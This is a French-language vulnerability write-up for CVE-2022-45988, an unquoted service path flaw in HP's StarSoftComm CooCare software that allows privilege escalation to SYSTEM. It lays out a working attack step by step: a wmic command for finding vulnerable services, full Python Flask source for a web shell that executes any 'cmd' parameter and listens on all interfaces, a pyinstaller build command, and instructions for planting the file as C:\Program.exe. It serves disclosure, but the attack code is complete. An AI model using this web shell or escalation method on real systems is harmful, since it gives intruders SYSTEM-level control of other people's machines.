
CVE-2022-45988 StarSoftComm HP CooCare Une vulnérabilité d'élévation de privilèges existe
####################################################
J'ai contacté hp-security-alert. Ils ont corrigé ce bug. À propos de StarSoftComm CooCare [HP-PSRT-IR #4106]
Le vendeur a répondu avec les informations suivantes :
Suivez ces étapes pour mettre à jour :
#####################################
Une vulnérabilité d'élévation de privilèges existe dans StarSoftComm HP CooCare qui pourrait permettre à un attaquant d'élever son niveau de privilèges. e管家超级版 est un logiciel de diagnostic à distance intégré au HP Star 14 Pro, développé par StarSoftComm (软通科技).
testé sur Windows 11 22621.819, HP LAPTOP HP Pavilion Plus 14 pouces ordinateur portable 14-eh0000 (56D77AV)
Version affectée : CooCare antérieure à v5.364
#Reproduction de la vulnérabilité
#La première étape : wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ trouver le service (Utilisez la commande CMD ci-dessus pour trouver les services non référencés)

Le nom du service est Windows Application Management Service, aussi appelé WinAppMgmt. Le service s'appelle Windows Application Management Service, abrégé en WinAppMgmt.

Le service provient de StarSoftComm CooCare

#Étape 2 : Préparer un programme malveillant

from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Reception? cmd= parameter
a=os.popen(r[0]) #Execute system commands
l = a.read()
return l #return
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145
J'utilisais python3 flask pour écrire un exe malveillant. Il peut écouter le port HTTP 14145 et exécuter des commandes système.
En utilisant la commande pyinstaller.exe --onefile --windowed -F -w python_test.py pour créer un exe malveillant.
#Étape 3 : Placer le malware dans le chemin C:\ et renommer le malware en Program.exe

#Étape 4 : Démarrer le service Windows Application Management Service
Si le service Windows Application Management Service est déjà démarré, vous pouvez le redémarrer

#Étape 5 : Attendre le démarrage du service Windows Application Management Service et exécuter les commandes système C:\Program.exe s'exécute en tant que SYSTEM
Quand je vois dans Taskmgr.exe que le service Windows Application Management Service démarre avec SYSTEM, alors je peux ouvrir le navigateur et entrer http://127.0.0.1:14145?cmd=whoami
Attendez..........
pour...
ça.
NT SYSTEM
